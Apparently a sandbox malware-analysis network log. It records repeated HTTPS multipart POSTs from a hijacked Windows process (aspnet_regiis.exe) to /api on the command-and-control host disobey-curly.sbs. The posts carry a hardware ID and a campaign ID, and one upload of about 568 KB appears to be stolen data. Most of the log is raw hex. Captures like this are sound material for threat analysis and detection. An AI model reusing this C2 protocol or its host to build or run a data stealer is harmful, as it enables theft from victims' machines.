                                                                      2024-11-23 13:59:53 UTC1369INData Raw: 2b 37 37 77 61 6c 31 33 4d 65 73 4e 46 68 78 77 35 65 73 38 78 4d 71 37 37 66 54 66 34 2b 37 44 52 73 6b 70 62 51 61 6f 57 4a 6d 64 77 4f 4a 2f 57 58 34 6d 2b 67 74 55 65 79 69 76 34 32 79 62 35 50 53 6b 76 59 54 30 75 4a 59 46 67 43 6c 57 57 61 67 59 69 5a 66 62 67 69 38 41 49 48 50 7a 56 41 41 63 4b 4f 57 38 4c 74 4b 7a 36 61 53 72 68 4c 58 37 33 45 54 49 61 6b 52 4c 72 33 37 6e 34 70 72 61 65 6b 42 68 48 39 49 64 41 31 45 34 73 76 55 77 69 66 44 31 36 76 54 53 73 72 61 4f 57 59 34 78 61 77 69 67 41 4f 61 4c 77 4d 38 38 44 7a 41 55 37 78 51 58 57 79 69 30 71 56 75 47 2f 76 33 7a 34 6f 53 38 75 4d 67 57 6c 6a 6b 63 43 4f 78 52 6d 5a 33 51 68 53 63 43 49 33 61 38 53 41 59 53 4a 2b 58 79 50 4d 53 68 74 61 54 68 68 4b 71 34 69 56 58 63 65 31 52 4c 2f 6b 4f
                                                                      Data Ascii: +77wal13MesNFhxw5es8xMq77fTf4+7DRskpbQaoWJmdwOJ/WX4m+gtUeyiv42yb5PSkvYT0uJYFgClWWagYiZfbgi8AIHPzVAAcKOW8LtKz6aSrhLX73ETIakRLr37n4praekBhH9IdA1E4svUwifD16vTSsraOWY4xawigAOaLwM88DzAU7xQXWyi0qVuG/v3z4oS8uMgWljkcCOxRmZ3QhScCI3a8SAYSJ+XyPMShtaThhKq4iVXce1RL/kO
                                                                      2024-11-23 13:59:53 UTC1369INData Raw: 79 51 58 52 53 4c 69 46 42 35 4b 4c 2b 6a 44 63 70 76 79 37 66 54 6b 79 37 4b 32 6a 6c 43 4f 4d 51 41 47 71 45 54 49 68 64 69 48 4c 67 77 6c 63 72 74 4b 53 30 4e 77 76 4b 52 71 33 4b 75 70 71 72 50 57 73 71 43 4f 45 63 31 37 51 45 37 72 56 74 71 43 76 75 6c 62 57 58 63 67 2b 67 6f 4f 55 33 47 4c 30 6c 32 69 7a 65 37 6e 2f 63 72 31 37 74 38 57 67 43 6c 64 43 4c 42 35 6d 59 33 41 36 44 49 58 61 47 47 30 57 69 78 66 4d 4b 76 6a 61 6f 32 2b 33 4f 72 30 78 65 54 6f 32 56 6d 42 52 32 52 70 71 41 36 5a 77 38 43 50 4c 68 6b 77 4a 66 31 61 51 51 78 73 2f 72 45 76 79 36 4f 70 2b 37 33 64 73 75 36 4f 44 70 77 6e 45 6c 71 6f 47 4a 6d 43 67 38 56 75 55 58 4d 33 37 31 30 6e 59 68 6d 72 34 33 32 4b 34 2f 62 6f 30 73 66 6a 38 76 42 6f 32 32 70 63 52 75 39 57 79 49 58 4f
                                                                      Data Ascii: yQXRSLiFB5KL+jDcpvy7fTky7K2jlCOMQAGqETIhdiHLgwlcrtKS0NwvKRq3KupqrPWsqCOEc17QE7rVtqCvulbWXcg+goOU3GL0l2ize7n/cr17t8WgCldCLB5mY3A6DIXaGG0WixfMKvjao2+3Or0xeTo2VmBR2RpqA6Zw8CPLhkwJf1aQQxs/rEvy6Op+73dsu6ODpwnElqoGJmCg8VuUXM3710nYhmr432K4/bo0sfj8vBo22pcRu9WyIXO
                                                                      2024-11-23 13:59:53 UTC1369INData Raw: 30 6c 2b 67 38 61 54 44 6d 62 32 6c 47 4f 39 4f 76 6e 73 65 6a 31 39 63 4a 6f 38 46 35 44 54 2f 67 43 2f 38 61 57 31 44 77 5a 4d 44 6d 73 51 6c 6c 78 4c 4b 4c 30 66 39 37 66 2f 4f 6e 2f 68 4f 32 32 31 78 62 59 4b 51 6f 62 70 67 44 4c 68 64 69 58 4f 31 52 69 4d 2b 6f 5a 44 31 39 35 6d 39 70 52 6a 76 54 72 35 37 48 31 2f 2f 7a 59 51 38 31 35 56 58 62 57 62 63 76 43 6b 4e 51 2b 63 6b 70 6a 33 51 77 61 58 44 43 69 70 44 4c 63 36 37 75 38 73 2b 6e 67 2f 39 35 56 6a 45 78 6f 43 74 6c 57 32 73 57 4f 30 44 78 49 50 6a 69 73 44 46 6b 45 62 65 75 6b 62 74 79 72 75 36 50 39 79 66 50 37 77 46 58 63 65 31 52 4c 2f 6b 4f 65 2b 37 37 34 64 31 5a 67 4c 50 30 58 48 55 6f 41 6d 38 4e 36 6d 66 54 46 32 73 54 56 39 65 69 4d 63 4d 31 2f 55 51 69 6d 41 4d 47 46 32 4a 64 62 55
                                                                      Data Ascii: 0l+g8aTDmb2lGO9Ovnsej19cJo8F5DT/gC/8aW1DwZMDmsQllxLKL0f97f/On/hO221xbYKQobpgDLhdiXO1RiM+oZD195m9pRjvTr57H1//zYQ815VXbWbcvCkNQ+ckpj3QwaXDCipDLc67u8s+ng/95VjExoCtlW2sWO0DxIPjisDFkEbeukbtyru6P9yfP7wFXce1RL/kOe+774d1ZgLP0XHUoAm8N6mfTF2sTV9eiMcM1/UQimAMGF2JdbU


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449734172.67.223.1404432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 13:59:55 UTC280OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=PN69PVY0VSG3MGC
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 18147
                                                                      Host: disobey-curly.sbs
                                                                      2024-11-23 13:59:55 UTC15331OUTData Raw: 2d 2d 50 4e 36 39 50 56 59 30 56 53 47 33 4d 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 50 4e 36 39 50 56 59 30 56 53 47 33 4d 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4e 36 39 50 56 59 30 56 53 47 33 4d 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d 0a 2d 2d 50 4e 36
                                                                      Data Ascii: --PN69PVY0VSG3MGCContent-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--PN69PVY0VSG3MGCContent-Disposition: form-data; name="pid"2--PN69PVY0VSG3MGCContent-Disposition: form-data; name="lid"H8NgCl--lonikir--PN6
                                                                      2024-11-23 13:59:55 UTC2816OUTData Raw: 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77
                                                                      Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!w
                                                                      2024-11-23 13:59:56 UTC1021INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 13:59:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=j4vt5hjntl9a4ju2dkcuhfs092; expires=Wed, 19-Mar-2025 07:46:34 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbjnHSYW%2FHdInsOYffebBgThTKIfG4Wdz1YSuLBuykC17C7ylombD62cnQzNrVGZ6%2F5DfdtAvg2RGDcN0Oisy3BpXtiLHLa11ZTLsZbPnOoJxxchE2%2Fah3QyKy30msaNt62%2B6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71aebc6b7842ab-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2096&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19107&delivery_rate=1411309&cwnd=199&unsent_bytes=0&cid=617d790dc009292c&ts=973&x=0"
                                                                      2024-11-23 13:59:56 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 13:59:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449737172.67.223.1404432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 13:59:57 UTC281OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=R8OZ1M0FCCDE4CGU3
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8780
                                                                      Host: disobey-curly.sbs
                                                                      2024-11-23 13:59:57 UTC8780OUTData Raw: 2d 2d 52 38 4f 5a 31 4d 30 46 43 43 44 45 34 43 47 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 52 38 4f 5a 31 4d 30 46 43 43 44 45 34 43 47 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 38 4f 5a 31 4d 30 46 43 43 44 45 34 43 47 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d
                                                                      Data Ascii: --R8OZ1M0FCCDE4CGU3Content-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--R8OZ1M0FCCDE4CGU3Content-Disposition: form-data; name="pid"2--R8OZ1M0FCCDE4CGU3Content-Disposition: form-data; name="lid"H8NgCl--lonikir
                                                                      2024-11-23 13:59:58 UTC1021INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 13:59:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=sssmekpovk1q0161fjcdcm653k; expires=Wed, 19-Mar-2025 07:46:37 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4cV%2FGxT0hAOohcfgRFNrWjVwjWQTyC2%2BhQSOoS%2F9TnuO1lCARl%2BwZimvSadhrQuIIEMEvzeuSbmfjDktUBtYfa1YoBQuWLfGaaFxcPRYRUpW50p0xzFYuV0fgkJ%2FEHHwoS8zA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71aecbfc46728f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1982&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9719&delivery_rate=1418164&cwnd=149&unsent_bytes=0&cid=a477ee0fd79f350a&ts=844&x=0"
                                                                      2024-11-23 13:59:58 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 13:59:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449739172.67.223.1404432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:00:00 UTC278OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=4W6Y6DDOCXYZ0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20409
                                                                      Host: disobey-curly.sbs
                                                                      2024-11-23 14:00:00 UTC15331OUTData Raw: 2d 2d 34 57 36 59 36 44 44 4f 43 58 59 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 34 57 36 59 36 44 44 4f 43 58 59 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 57 36 59 36 44 44 4f 43 58 59 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d 0a 2d 2d 34 57 36 59 36 44 44 4f 43
                                                                      Data Ascii: --4W6Y6DDOCXYZ0Content-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--4W6Y6DDOCXYZ0Content-Disposition: form-data; name="pid"3--4W6Y6DDOCXYZ0Content-Disposition: form-data; name="lid"H8NgCl--lonikir--4W6Y6DDOC
                                                                      2024-11-23 14:00:00 UTC5078OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: lrQMn 64F6(X&7~`aO
                                                                      2024-11-23 14:00:01 UTC1017INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:00:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=keq2qo785npk5s9q01nrg7sg8h; expires=Wed, 19-Mar-2025 07:46:39 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RyMoUgl4hpup8ZgUEs2FNdcluA396AfBtUuMQFn8fW%2BPWJZB9tIy64AaL2Fel45vW06MhNAg%2BERuRQDPMOxDEgqrWMTOWdVv2cR0JWGJFMI7Sd5ISVhIEhk8OS08ORsSY7RNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71aedaac1b8c87-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2010&sent=16&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21367&delivery_rate=1414043&cwnd=214&unsent_bytes=0&cid=0c88f7145a85d775&ts=892&x=0"
                                                                      2024-11-23 14:00:01 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:00:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449741172.67.223.1404432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:00:02 UTC274OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=XUYYFZQQQC
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1225
                                                                      Host: disobey-curly.sbs
                                                                      2024-11-23 14:00:02 UTC1225OUTData Raw: 2d 2d 58 55 59 59 46 5a 51 51 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 58 55 59 59 46 5a 51 51 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 55 59 59 46 5a 51 51 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d 0a 2d 2d 58 55 59 59 46 5a 51 51 51 43 0d 0a 43 6f 6e 74 65 6e
                                                                      Data Ascii: --XUYYFZQQQCContent-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--XUYYFZQQQCContent-Disposition: form-data; name="pid"1--XUYYFZQQQCContent-Disposition: form-data; name="lid"H8NgCl--lonikir--XUYYFZQQQCConten
                                                                      2024-11-23 14:00:03 UTC1018INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:00:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=5sierhpubkuk514r5pqkq3d594; expires=Wed, 19-Mar-2025 07:46:42 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BTziKg6f9AhpyqB7Fv4cfsQQ5s%2B09rVUN4U5bLa3IHyAsV%2FczuOXDLPzyyH855fyGwoVbKJIkGnC5UVzjW0HK98DyPGGHU%2FZrKzhS6t2GLVeYVYxDVj0xt8IfRN7VWJ9CmwmiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71aeea395def9f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2135&delivery_rate=1436301&cwnd=190&unsent_bytes=0&cid=819d1e175fb6be70&ts=712&x=0"
                                                                      2024-11-23 14:00:03 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:00:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.449742172.67.223.1404432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:00:05 UTC283OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=H7HA15TN2DGIA4Z42
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 568214
                                                                      Host: disobey-curly.sbs
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: 2d 2d 48 37 48 41 31 35 54 4e 32 44 47 49 41 34 5a 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 48 37 48 41 31 35 54 4e 32 44 47 49 41 34 5a 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 37 48 41 31 35 54 4e 32 44 47 49 41 34 5a 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d
                                                                      Data Ascii: --H7HA15TN2DGIA4Z42Content-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--H7HA15TN2DGIA4Z42Content-Disposition: form-data; name="pid"1--H7HA15TN2DGIA4Z42Content-Disposition: form-data; name="lid"H8NgCl--lonikir
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: eb 7b ec d3 7b a1 9d d3 89 4a e2 e5 c0 7c 80 ee 8e 84 05 d1 7e ce c2 28 c6 d7 d9 c7 e3 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab
                                                                      Data Ascii: {{J|~(OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__
                                                                      2024-11-23 14:00:05 UTC15331OUTData Raw: 22 00 f2 7a f0 fc b7 c7 83 7d 9a 77 de de dd 2d 7b 68 59 4a c9 ad ee aa 2a 77 8f 7e 56 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c
                                                                      Data Ascii: "z}w-{hYJ*w~V<.iQx;8%Z^[*BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIEL
